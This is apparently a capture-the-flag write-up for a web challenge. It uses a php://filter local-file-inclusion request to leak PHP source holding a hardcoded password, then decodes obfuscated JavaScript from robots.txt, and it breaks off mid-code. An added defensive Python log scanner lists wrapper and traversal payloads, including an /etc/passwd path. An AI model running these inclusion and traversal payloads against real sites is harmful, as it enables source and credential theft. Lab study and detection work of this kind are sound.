
BMZCTF WP

Comprehensive Penetration

BMZ_Market

Open the environment

View the source

```html
<!DOCTYPE html>
<html lang="en"><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<meta name="description" content="BMZ Market">
<meta name="author" content="bmz">

<title>BMZ Market</title>

<link href="bootstrap.css" rel="stylesheet">

<link href="covers.css" rel="stylesheet">
</head>

<body class="text-center">

<div class="cover-container d-flex w-100 h-100 p-3 mx-auto flex-column">
<header class="masthead mb-auto">
<div class="inner">
<h3 class="masthead-brand">BMZ Market</h3>
<nav class="nav nav-masthead justify-content-center">
<a class="nav-link active" href="#">Home</a>
<!-- <a class="nav-link active" href="?lang=fr">Fr/a> -->
</nav>
</div>
</header>

<main role="main" class="inner cover">
<h1 class="cover-heading">Coming soon</h1>
<p class="lead">

Believe in yourself, you can find the flag
</p>
<p class="lead">
<a href="#" class="btn btn-lg btn-secondary">more</a>
</p>
</main>

<footer class="mastfoot mt-auto">
<div class="inner">
<p>Power by<a href="#">@kuaile</a></p>
</div>
</footer>
</div>

</body></html>
```

Note the commented-out link with ?lang=fr. I remember seeing something like this before; it should be a file inclusion. Appending it to the URL and visiting, the page content hardly changes from the original; changing it to lang=cn produces an error.

View the contents of index.php

```http
GET /?lang=php://filter/convert.base64-encode/resource=index HTTP/1.1
Host: www.bmzclub.cn:21490
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: session=ca99f077-3758-40ca-802a-0b8afbf5b9e7; Hm_lvt_d7a3b863d5a302676afbe86b11339abd=1612590588,1612590698; Hm_lpvt_d7a3b863d5a302676afbe86b11339abd=1612590698; PHPSESSID=r8hvjhmrvbjjcp8sbov7pmm2p0
Connection: close
```


After base64 decoding, we get the contents of index.php

```php
<?php
$password ="Nevergiveup135." ;//I have to remember it

if (isset($_GET['lang']))
{
include($_GET['lang'].".php");
}

?>

<!DOCTYPE html>
<html lang="en"><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<meta name="description" content="BMZ Market">
<meta name="author" content="bmz">

<title>BMZ Market</title>

<link href="bootstrap.css" rel="stylesheet">

<link href="covers.css" rel="stylesheet">
</head>

<body class="text-center">

<div class="cover-container d-flex w-100 h-100 p-3 mx-auto flex-column">
<header class="masthead mb-auto">
<div class="inner">
<h3 class="masthead-brand">BMZ Market</h3>
<nav class="nav nav-masthead justify-content-center">
<a class="nav-link active" href="#">Home</a>
<!-- <a class="nav-link active" href="?lang=fr">Fr/a> -->
</nav>
</div>
</header>

<main role="main" class="inner cover">
<h1 class="cover-heading">Coming soon</h1>
<p class="lead">
<?php
if (isset($_GET['lang']))
{
echo $message;
}
else
{
?>

Believe in yourself, you can find the flag
<?php
}
?>
</p>
<p class="lead">
<a href="#" class="btn btn-lg btn-secondary">more</a>
</p>
</main>

<footer class="mastfoot mt-auto">
<div class="inner">
<p>Power by<a href="#">@kuaile</a></p>
</div>
</footer>
</div>

</body></html>
```
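As an added defensive example (not code from the writeup or from the challenge), the Python below shows the two things a defender would do with the include($_GET['lang'].".php") pattern in index.php: replace the concatenation with a fixed allowlist lookup, so the request value never becomes part of a path, and hunt access logs for wrapper or traversal values in the lang parameter. The allowlist contents, the combined-log format and the log lines themselves are assumptions constructed for the example; the second log line mirrors the php://filter request shown above.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, unquote, urlsplit

# Languages the application actually ships (assumption for this example;
# the writeup only shows fr and cn being tried).
ALLOWED_LANGS = {"en", "fr", "cn"}


def resolve_lang_file(lang: str) -> Optional[str]:
    """Allowlist replacement for include($_GET['lang'].".php").

    The user value is only used as a set member, never concatenated into a
    path, so stream wrappers (php://filter) and traversal (../) cannot reach
    include(). Anything not in the allowlist yields None and the caller should
    fall back to the default language.
    """
    return f"{lang}.php" if lang in ALLOWED_LANGS else None


# Values that should never appear in a parameter that feeds a file include:
# PHP stream wrappers, directory traversal and null bytes.
SUSPICIOUS = re.compile(
    r"(?i)(?:\b(?:php|data|file|phar|zip|expect|glob|compress\.zlib)://|\.\./|\.\.\\|%00|\x00)"
)

# Apache/nginx "combined" access log line (only the fields we need).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def scan_access_log(lines: List[str]) -> List[Dict[str, str]]:
    """Return one finding per query parameter whose value matches SUSPICIOUS."""
    findings: List[Dict[str, str]] = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        for param, values in parse_qs(query, keep_blank_values=True).items():
            for value in values:
                # parse_qs already decoded once; decode again so a
                # double-encoded wrapper (%2570hp://) is still caught.
                decoded = unquote(value)
                if SUSPICIOUS.search(decoded):
                    findings.append({
                        "ip": m.group("ip"),
                        "time": m.group("ts"),
                        "param": param,
                        "value": decoded,
                        "status": m.group("status"),
                    })
    return findings


# Constructed log lines for the example: IPs and timestamps are made up, the
# second line mirrors the php://filter request from the writeup.
SAMPLE_LOG = [
    '203.0.113.7 - - [06/Feb/2021:14:29:48 +0800] "GET /?lang=fr HTTP/1.1" 200 1512',
    '203.0.113.7 - - [06/Feb/2021:14:30:01 +0800] "GET /?lang=php://filter/convert.base64-encode/resource=index HTTP/1.1" 200 3920',
    '203.0.113.7 - - [06/Feb/2021:14:30:15 +0800] "GET /?lang=../../../../etc/passwd HTTP/1.1" 500 2011',
    '198.51.100.2 - - [06/Feb/2021:14:31:00 +0800] "GET /bootstrap.css HTTP/1.1" 200 150000',
    '203.0.113.7 - - [06/Feb/2021:14:32:00 +0800] "GET /?lang=%70%68%70%3a%2f%2ffilter/resource=bmzadmin HTTP/1.1" 200 4100',
]

if __name__ == "__main__":
    print(resolve_lang_file("fr"), resolve_lang_file("php://filter/resource=index"))
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} param={f['param']} status={f['status']} value={f['value']}")
```

A 200 response to a php://filter request is the signal to chase: it means the wrapper was accepted and source was returned, exactly what happened here.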

Directory brute-forcing gave the following results; nothing was found under admin or backup, and the corresponding php files do not exist either.

View robots.txt

```text
776fz4nvvp/vvok9IC/vvYDvvY3CtO+8ie++iSB+4pS74pSB4pS7ICAgLy8qwrTiiIfvvYAqLyBbJ18nXTsgbz0o776f772w776fKSAgPV89MzsgYz0o776fzpjvvp8pID0o776f772w776fKS0o776f772w776fKTsgKO++n9CU776fKSA9KO++n86Y776fKT0gKG9eX15vKS8gKG9eX15vKTso776f0JTvvp8pPXvvvp/OmO++nzogJ18nICzvvp/Pie++n+++iSA6ICgo776fz4nvvp/vvok9PTMpICsnXycpIFvvvp/OmO++n10gLO++n++9sO++n+++iSA6KO++n8+J776f776JKyAnXycpW29eX15vIC0o776fzpjvvp8pXSAs776f0JTvvp/vvok6KCjvvp/vvbDvvp89PTMpICsnXycpW+++n++9sO++n10gfTsgKO++n9CU776fKSBb776fzpjvvp9dID0oKO++n8+J776f776JPT0zKSArJ18nKSBbY15fXm9dOyjvvp/QlO++nykgWydjJ10gPSAoKO++n9CU776fKSsnXycpIFsgKO++n++9sO++nykrKO++n++9sO++nyktKO++n86Y776fKSBdOyjvvp/QlO++nykgWydvJ10gPSAoKO++n9CU776fKSsnXycpIFvvvp/OmO++n107KO++n2/vvp8pPSjvvp/QlO++nykgWydjJ10rKO++n9CU776fKSBbJ28nXSso776fz4nvvp/vvokgKydfJylb776fzpjvvp9dKyAoKO++n8+J776f776JPT0zKSArJ18nKSBb776f772w776fXSArICgo776f0JTvvp8pICsnXycpIFso776f772w776fKSso776f772w776fKV0rICgo776f772w776fPT0zKSArJ18nKSBb776fzpjvvp9dKygo776f772w776fPT0zKSArJ18nKSBbKO++n++9sO++nykgLSAo776fzpjvvp8pXSso776f0JTvvp8pIFsnYyddKygo776f0JTvvp8pKydfJykgWyjvvp/vvbDvvp8pKyjvvp/vvbDvvp8pXSsgKO++n9CU776fKSBbJ28nXSsoKO++n++9sO++nz09MykgKydfJykgW+++n86Y776fXTso776f0JTvvp8pIFsnXyddID0ob15fXm8pIFvvvp9v776fXSBb776fb+++n107KO++n861776fKT0oKO++n++9sO++nz09MykgKydfJykgW+++n86Y776fXSsgKO++n9CU776fKSAu776f0JTvvp/vvokrKCjvvp/QlO++nykrJ18nKSBbKO++n++9sO++nykgKyAo776f772w776fKV0rKCjvvp/vvbDvvp89PTMpICsnXycpIFtvXl9ebyAt776fzpjvvp9dKygo776f772w776fPT0zKSArJ18nKSBb776fzpjvvp9dKyAo776fz4nvvp/vvokgKydfJykgW+++n86Y776fXTsgKO++n++9sO++nykrPSjvvp/OmO++nyk7ICjvvp/QlO++nylb776fzrXvvp9dPSdcXCc7ICjvvp/QlO++nyku776fzpjvvp/vvok9KO++n9CU776fKyDvvp/vvbDvvp8pW29eX15vIC0o776fzpjvvp8pXTsob+++n++9sO++n28pPSjvvp/Pie++n+++iSArJ18nKVtjXl9eb107KO++n9CU776fKSBb776fb+++n109J1wiJzso776f0JTvvp8pIFsnXyddICggKO++n9CU776fKSBbJ18nXSAo776fzrXvvp8rKO++n9CU776fKVvvvp9v776fXSsgKO++n9CU776fKVvvvp/Ote++n10rKO++n86Y776fKSsgKO++n++9sO++nykrICjvvp/OmO++nykrICjvvp/QlO++nylb776fzrXvvp9dKyjvvp/OmO++nykrICgo776f772w776fKSArICjvvp/OmO++nykp
KyAo776f772w776fKSsgKO++n9CU776fKVvvvp/Ote++n10rKO++n86Y776fKSsgKO++n++9sO++nykrICgo776f772w776fKSArICjvvp/OmO++nykpKyAo776f0JTvvp8pW+++n861776fXSso776fzpjvvp8pKyAoKG9eX15vKSArKG9eX15vKSkrICgob15fXm8pIC0gKO++n86Y776fKSkrICjvvp/QlO++nylb776fzrXvvp9dKyjvvp/OmO++nykrICgob15fXm8pICsob15fXm8pKSsgKO++n++9sO++nykrICjvvp/QlO++nylb776fzrXvvp9dKygo776f772w776fKSArICjvvp/OmO++nykpKyAoY15fXm8pKyAo776f0JTvvp8pW+++n861776fXSso776f772w776fKSsgKChvXl9ebykgLSAo776fzpjvvp8pKSsgKO++n9CU776fKVvvvp/Ote++n10rKO++n86Y776fKSsgKGNeX15vKSsgKG9eX15vKSsgKO++n9CU776fKVvvvp/Ote++n10rKO++n86Y776fKSsgKCjvvp/vvbDvvp8pICsgKO++n86Y776fKSkrIChjXl9ebykrICjvvp/QlO++nylb776fzrXvvp9dKyjvvp/OmO++nykrICjvvp/vvbDvvp8pKyAo776fzpjvvp8pKyAo776f0JTvvp8pW+++n861776fXSso776fzpjvvp8pKyAoKO++n++9sO++nykgKyAo776fzpjvvp8pKSsgKO++n++9sO++nykrICjvvp/QlO++nylb776fzrXvvp9dKyjvvp/OmO++nykrICgo776f772w776fKSArICjvvp/OmO++nykpKyAo776f772w776fKSsgKO++n9CU776fKVvvvp/Ote++n10rKO++n86Y776fKSsgKO++n++9sO++nykrICgo776f772w776fKSArICjvvp/OmO++nykpKyAo776f0JTvvp8pW+++n861776fXSso776fzpjvvp8pKyAoKO++n++9sO++nykgKyAo776fzpjvvp8pKSsgKChvXl9ebykgKyhvXl9ebykpKyAo776f0JTvvp8pW+++n861776fXSso776fzpjvvp8pKyAo776f772w776fKSsgKCjvvp/vvbDvvp8pICsgKG9eX15vKSkrICjvvp/QlO++nylb776fzrXvvp9dKyjvvp/OmO++nykrICjvvp/vvbDvvp8pKyAoKO++n++9sO++nykgKyAo776fzpjvvp8pKSsgKO++n9CU776fKVvvvp/Ote++n10rKO++n86Y776fKSsgKChvXl9ebykgKyhvXl9ebykpKyAoKG9eX15vKSAtICjvvp/OmO++nykpKyAo776f0JTvvp8pW+++n861776fXSsoKO++n++9sO++nykgKyAo776fzpjvvp8pKSsgKO++n++9sO++nykrICjvvp/QlO++nylb776fzrXvvp9dKyjvvp/vvbDvvp8pKyAoY15fXm8pKyAo776f0JTvvp8pW+++n861776fXSso776fzpjvvp8pKyAoKG9eX15vKSArKG9eX15vKSkrICjvvp/vvbDvvp8pKyAo776f0JTvvp8pW+++n861776fXSso776fzpjvvp8pKyAoKO++n++9sO++nykgKyAo776fzpjvvp8pKSsgKGNeX15vKSsgKO++n9CU776fKVvvvp/Ote++n10rKO++n86Y776fKSsgKO++n++9sO++nykrICgo776f772w776fKSArICjvvp/OmO++nykpKyAo776f0JTvvp8pW+++n861776fXSso776f772w776fKSsgKGNeX15vKSsgKO++n9CU776fKVvvvp/Ote++n10rKO++n86Y776fKSsgKO++n++9sO++nykrICgob15fXm8pIC0gKO++n86Y776fKSkrICjvvp/QlO++nylb776fzrXvvp9d
Kyjvvp/OmO++nykrICjvvp/vvbDvvp8pKyAo776fzpjvvp8pKyAo776f0JTvvp8pW+++n861776fXSso776fzpjvvp8pKyAo776f772w776fKSsgKG9eX15vKSsgKO++n9CU776fKVvvvp/Ote++n10rKO++n86Y776fKSsgKCjvvp/vvbDvvp8pICsgKO++n86Y776fKSkrIChvXl9ebykrICjvvp/QlO++nylb776fzrXvvp9dKyjvvp/OmO++nykrICjvvp/vvbDvvp8pKyAoKO++n++9sO++nykgKyAob15fXm8pKSsgKO++n9CU776fKVvvvp/Ote++n10rKO++n86Y776fKSsgKChvXl9ebykgKyhvXl9ebykpKyAoKG9eX15vKSAtICjvvp/OmO++nykpKyAo776f0JTvvp8pW+++n861776fXSso776fzpjvvp8pKyAoKO++n++9sO++nykgKyAo776fzpjvvp8pKSsgKCjvvp/vvbDvvp8pICsgKG9eX15vKSkrICjvvp/QlO++nylb776fzrXvvp9dKyjvvp/OmO++nykrICgob15fXm8pICsob15fXm8pKSsgKCjvvp/vvbDvvp8pICsgKO++n86Y776fKSkrICjvvp/QlO++nylb776fzrXvvp9dKyjvvp/OmO++nykrICgo776f772w776fKSArICjvvp/OmO++nykpKyAoKG9eX15vKSArKG9eX15vKSkrICjvvp/QlO++nylb776fzrXvvp9dKyjvvp/OmO++nykrICjvvp/vvbDvvp8pKyAo776f772w776fKSsgKO++n9CU776fKVvvvp/Ote++n10rKO++n++9sO++nykrIChjXl9ebykrICjvvp/QlO++nylb776fzrXvvp9dKyjvvp/OmO++nykrICgo776f772w776fKSArICjvvp/OmO++nykpKyAoKO++n++9sO++nykgKyAob15fXm8pKSsgKO++n9CU776fKVvvvp/Ote++n10rKO++n86Y776fKSsgKO++n++9sO++nykrICgob15fXm8pICsob15fXm8pKSsgKO++n9CU776fKVvvvp/Ote++n10rKO++n++9sO++nykrIChjXl9ebykrICjvvp/QlO++nylb776fzrXvvp9dKyjvvp/OmO++nykrICgob15fXm8pICsob15fXm8pKSsgKO++n++9sO++nykrICjvvp/QlO++nylb776fzrXvvp9dKyjvvp/OmO++nykrICgo776f772w776fKSArICjvvp/OmO++nykpKyAoY15fXm8pKyAo776f0JTvvp8pW+++n861776fXSso776fzpjvvp8pKyAo776f772w776fKSsgKCjvvp/vvbDvvp8pICsgKO++n86Y776fKSkrICjvvp/QlO++nylb776fzrXvvp9dKyjvvp/vvbDvvp8pKyAoY15fXm8pKyAo776f0JTvvp8pW+++n861776fXSso776fzpjvvp8pKyAoKG9eX15vKSArKG9eX15vKSkrICgo776f772w776fKSArIChvXl9ebykpKyAo776f0JTvvp8pW+++n861776fXSso776fzpjvvp8pKyAo776f772w776fKSsgKCjvvp/vvbDvvp8pICsgKO++n86Y776fKSkrICjvvp/QlO++nylb776fzrXvvp9dKyjvvp/OmO++nykrICjvvp/vvbDvvp8pKyAoKG9eX15vKSAtICjvvp/OmO++nykpKyAo776f0JTvvp8pW+++n861776fXSso776fzpjvvp8pKyAoKG9eX15vKSArKG9eX15vKSkrIChvXl9ebykrICjvvp/QlO++nylb776fzrXvvp9dKyjvvp/OmO++nykrICgo776f772w776fKSArICjvvp/OmO++nykpKyAo776fzpjvvp8pKyAo776f0JTvvp8pW+++n861776fXSso776fzpjvvp8pKyAo
KG9eX15vKSArKG9eX15vKSkrICjvvp/vvbDvvp8pKyAo776f0JTvvp8pW+++n861776fXSso776fzpjvvp8pKyAo776f772w776fKSsgKCjvvp/vvbDvvp8pICsgKO++n86Y776fKSkrICjvvp/QlO++nylb776fzrXvvp9dKyjvvp/vvbDvvp8pKyAoY15fXm8pKyAo776f0JTvvp8pW+++n861776fXSso776fzpjvvp8pKyAoKO++n++9sO++nykgKyAo776fzpjvvp8pKSsgKO++n86Y776fKSsgKO++n9CU776fKVvvvp/Ote++n10rKO++n86Y776fKSsgKChvXl9ebykgKyhvXl9ebykpKyAob15fXm8pKyAo776f0JTvvp8pW+++n861776fXSso776f772w776fKSsgKGNeX15vKSsgKO++n9CU776fKVvvvp/Ote++n10rKCjvvp/vvbDvvp8pICsgKO++n86Y776fKSkrICgo776f772w776fKSArICjvvp/OmO++nykpKyAo776f0JTvvp8pW+++n861776fXSsoKO++n++9sO++nykgKyAo776fzpjvvp8pKSsgKChvXl9ebykgKyhvXl9ebykpKyAo776f0JTvvp8pW+++n861776fXSsoKO++n++9sO++nykgKyAo776fzpjvvp8pKSsgKChvXl9ebykgKyhvXl9ebykpKyAo776f0JTvvp8pW+++n861776fXSsoKO++n++9sO++nykgKyAo776fzpjvvp8pKSsgKChvXl9ebykgKyhvXl9ebykpKyAo776f0JTvvp8pW+++n861776fXSsoKO++n++9sO++nykgKyAo776fzpjvvp8pKSsgKCjvvp/vvbDvvp8pICsgKG9eX15vKSkrICjvvp/QlO++nylb776fzrXvvp9dKygo776f772w776fKSArICjvvp/OmO++nykpKyAoKO++n++9sO++nykgKyAo776fzpjvvp8pKSsgKO++n9CU776fKVvvvp/Ote++n10rKCjvvp/vvbDvvp8pICsgKO++n86Y776fKSkrICgo776f772w776fKSArICjvvp/OmO++nykpKyAo776f0JTvvp8pW+++n861776fXSsoKO++n++9sO++nykgKyAo776fzpjvvp8pKSsgKCjvvp/vvbDvvp8pICsgKG9eX15vKSkrICjvvp/QlO++nylb776fzrXvvp9dKygo776f772w776fKSArICjvvp/OmO++nykpKyAoKO++n++9sO++nykgKyAo776fzpjvvp8pKSsgKO++n9CU776fKVvvvp/Ote++n10rKCjvvp/vvbDvvp8pICsgKO++n86Y776fKSkrICgo776f772w776fKSArICjvvp/OmO++nykpKyAo776f0JTvvp8pW+++n861776fXSsoKO++n++9sO++nykgKyAo776fzpjvvp8pKSsgKChvXl9ebykgKyhvXl9ebykpKyAo776f0JTvvp8pW+++n861776fXSsoKO++n++9sO++nykgKyAo776fzpjvvp8pKSsgKChvXl9ebykgKyhvXl9ebykpKyAo776f0JTvvp8pW+++n861776fXSsoKO++n++9sO++nykgKyAo776fzpjvvp8pKSsgKCjvvp/vvbDvvp8pICsgKG9eX15vKSkrICjvvp/QlO++nylb776fzrXvvp9dKygo776f772w776fKSArICjvvp/OmO++nykpKyAoKG9eX15vKSArKG9eX15vKSkrICjvvp/QlO++nylb776fzrXvvp9dKygo776f772w776fKSArICjvvp/OmO++nykpKyAoKO++n++9sO++nykgKyAo776fzpjvvp8pKSsgKO++n9CU776fKVvvvp/Ote++n10rKCjvvp/vvbDvvp8pICsgKO++n86Y776fKSkrICgo776f772w776fKSArIChvXl9ebykpKyAo
776f0JTvvp8pW+++n861776fXSsoKO++n++9sO++nykgKyAo776fzpjvvp8pKSsgKCjvvp/vvbDvvp8pICsgKO++n86Y776fKSkrICjvvp/QlO++nylb776fzrXvvp9dKygo776f772w776fKSArICjvvp/OmO++nykpKyAoKG9eX15vKSArKG9eX15vKSkrICjvvp/QlO++nylb776fzrXvvp9dKygo776f772w776fKSArICjvvp/OmO++nykpKyAoKG9eX15vKSArKG9eX15vKSkrICjvvp/QlO++nylb776fzrXvvp9dKygo776f772w776fKSArICjvvp/OmO++nykpKyAoKO++n++9sO++nykgKyAob15fXm8pKSsgKO++n9CU776fKVvvvp/Ote++n10rKCjvvp/vvbDvvp8pICsgKO++n86Y776fKSkrICgo776f772w776fKSArICjvvp/OmO++nykpKyAo776f0JTvvp8pW+++n861776fXSsoKO++n++9sO++nykgKyAo776fzpjvvp8pKSsgKCjvvp/vvbDvvp8pICsgKO++n86Y776fKSkrICjvvp/QlO++nylb776fzrXvvp9dKygo776f772w776fKSArICjvvp/OmO++nykpKyAoKO++n++9sO++nykgKyAob15fXm8pKSsgKO++n9CU776fKVvvvp/Ote++n10rKCjvvp/vvbDvvp8pICsgKO++n86Y776fKSkrICgob15fXm8pICsob15fXm8pKSsgKO++n9CU776fKVvvvp/Ote++n10rKCjvvp/vvbDvvp8pICsgKO++n86Y776fKSkrICgob15fXm8pICsob15fXm8pKSsgKO++n9CU776fKVvvvp/Ote++n10rKCjvvp/vvbDvvp8pICsgKO++n86Y776fKSkrICgo776f772w776fKSArIChvXl9ebykpKyAo776f0JTvvp8pW+++n861776fXSsoKO++n++9sO++nykgKyAo776fzpjvvp8pKSsgKCjvvp/vvbDvvp8pICsgKO++n86Y776fKSkrICjvvp/QlO++nylb776fzrXvvp9dKygo776f772w776fKSArICjvvp/OmO++nykpKyAoKG9eX15vKSArKG9eX15vKSkrICjvvp/QlO++nylb776fzrXvvp9dKyjvvp/vvbDvvp8pKyAoKG9eX15vKSAtICjvvp/OmO++nykpKyAo776f0JTvvp8pW+++n861776fXSsoKO++n++9sO++nykgKyAo776fzpjvvp8pKSsgKO++n86Y776fKSsgKO++n9CU776fKVvvvp9v776fXSkgKO++n86Y776fKSkgKCdfJyk7
```

It looks very much like a base-family encoding, but since there was no = I assumed it was not base64 (base64 only pads with = when the input length is not a multiple of 3 bytes). I was stuck on this for a long time and never found any other encoding or cipher whose output looks like this; reading the writeup revealed it really is base64...

Decoding gives

```js
゚ω゚ノ= /`m´)ノ ~┻━┻ //*´∇`*/ ['_']; o=(゚ー゚) =_=3; c=(゚Θ゚) =(゚ー゚)-(゚ー゚); (゚Д゚) =(゚Θ゚)= (o^_^o)/ (o^_^o);(゚Д゚)={゚Θ゚: '_' ,゚ω゚ノ : ((゚ω゚ノ==3) +'_') [゚Θ゚] ,゚ー゚ノ :(゚ω゚ノ+ '_')[o^_^o -(゚Θ゚)] ,゚Д゚ノ:((゚ー゚==3) +'_')[゚ー゚] }; (゚Д゚) [゚Θ゚] =((゚ω゚ノ==3) +'_') [c^_^o];(゚Д゚) ['c'] = ((゚Д゚)+'_') [ (゚ー゚)+(゚ー゚)-(゚Θ゚) ];(゚Д゚) ['o'] = ((゚Д゚)+'_') [゚Θ゚];(゚o゚)=(゚Д゚) ['c']+(゚Д゚) ['o']+(゚ω゚ノ +'_')[゚Θ゚]+ ((゚ω゚ノ==3) +'_') [゚ー゚] + ((゚Д゚) +'_') [(゚ー゚)+(゚ー゚)]+ ((゚ー゚==3) +'_') [゚Θ゚]+((゚ー゚==3) +'_') [(゚ー゚) - (゚Θ゚)]+(゚Д゚) ['c']+((゚Д゚)+'_') [(゚ー゚)+(゚ー゚)]+ (゚Д゚) ['o']+((゚ー゚==3) +'_') [゚Θ゚];(゚Д゚) ['_'] =(o^_^o) [゚o゚] [゚o゚];(゚ε゚)=((゚ー゚==3) +'_') [゚Θ゚]+ (゚Д゚) .゚Д゚ノ+((゚Д゚)+'_') [(゚ー゚) + (゚ー゚)]+((゚ー゚==3) +'_') [o^_^o -゚Θ゚]+((゚ー゚==3) +'_') [゚Θ゚]+ (゚ω゚ノ +'_') [゚Θ゚]; (゚ー゚)+=(゚Θ゚); (゚Д゚)[゚ε゚]='\\'; (゚Д゚).゚Θ゚ノ=(゚Д゚+ ゚ー゚)[o^_^o -(゚Θ゚)];(o゚ー゚o)=(゚ω゚ノ +'_')[c^_^o];(゚Д゚) [゚o゚]='\"';(゚Д゚) ['_'] ( (゚Д゚) ['_'] (゚ε゚+(゚Д゚)[゚o゚]+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ (゚ー゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ ((゚ー゚) + (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ ((o^_^o) - (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ (゚ー゚)+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ (c^_^o)+ (゚Д゚)[゚ε゚]+(゚ー゚)+ ((o^_^o) - (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (c^_^o)+ (o^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ (c^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ (゚ー゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ (゚ー゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ ((゚ー゚) + (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ ((o^_^o) +(o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ ((゚ー゚) + (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ ((o^_^o) - (゚Θ゚))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ (゚ー゚)+ (゚Д゚)[゚ε゚]+(゚ー゚)+ (c^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ (゚ー゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ (c^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ ((゚ー゚) + (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚ー゚)+ (c^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ ((o^_^o) - (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ (o^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ (o^_^o)+ 
(゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ ((o^_^o) - (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ ((゚ー゚) + (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ ((o^_^o) +(o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ (゚ー゚)+ (゚Д゚)[゚ε゚]+(゚ー゚)+ (c^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ ((o^_^o) +(o^_^o))+ (゚Д゚)[゚ε゚]+(゚ー゚)+ (c^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ (゚ー゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ (c^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ ((゚ー゚) + (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚ー゚)+ (c^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ ((゚ー゚) + (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ ((o^_^o) - (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ (o^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ (゚ー゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ ((゚ー゚) + (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚ー゚)+ (c^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ (゚Θ゚)+ 